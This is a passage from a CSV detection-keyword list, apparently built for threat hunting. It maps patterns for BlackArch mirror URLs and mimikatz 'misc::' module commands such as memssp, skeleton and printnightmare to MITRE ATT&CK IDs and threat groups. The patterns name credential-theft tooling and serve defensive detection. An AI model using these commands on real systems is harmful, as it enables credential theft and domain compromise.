"*mirrors.ocf.berkeley.edu/blackarch/*/os/*",".{0,1000}mirrors\.ocf\.berkeley\.edu\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52120"
"*mirrors.tuna.tsinghua.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.tuna\.tsinghua\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52121"
"*mirrors.ustc.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.ustc\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52122"
"*misc::aadcookie*",".{0,1000}misc\:\:aadcookie.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52123"
"*misc::clip*",".{0,1000}misc\:\:clip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52124"
"*misc::cmd*",".{0,1000}misc\:\:cmd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52125"
"*misc::compress*",".{0,1000}misc\:\:compress.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52126"
"*misc::detours*",".{0,1000}misc\:\:detours.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52127"
"*misc::efs*",".{0,1000}misc\:\:efs.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52128"
"*misc::lock*",".{0,1000}misc\:\:lock.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52129"
"*misc::memssp*",".{0,1000}misc\:\:memssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52130"
"*misc::mflt*",".{0,1000}misc\:\:mflt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52131"
"*misc::ncroutemon*",".{0,1000}misc\:\:ncroutemon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52132"
"*misc::ngcsign*",".{0,1000}misc\:\:ngcsign.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52133"
"*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52134"
"*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","mimikatz printnightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52135"
"*misc::regedit*",".{0,1000}misc\:\:regedit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52136"
"*misc::sccm*",".{0,1000}misc\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52137"
"*misc::shadowcopies*",".{0,1000}misc\:\:shadowcopies.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52138"
"*misc::skeleton*",".{0,1000}misc\:\:skeleton.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52139"
"*misc::spooler*",".{0,1000}misc\:\:spooler.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52140"
"*misc::taskmgr*",".{0,1000}misc\:\:taskmgr.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - 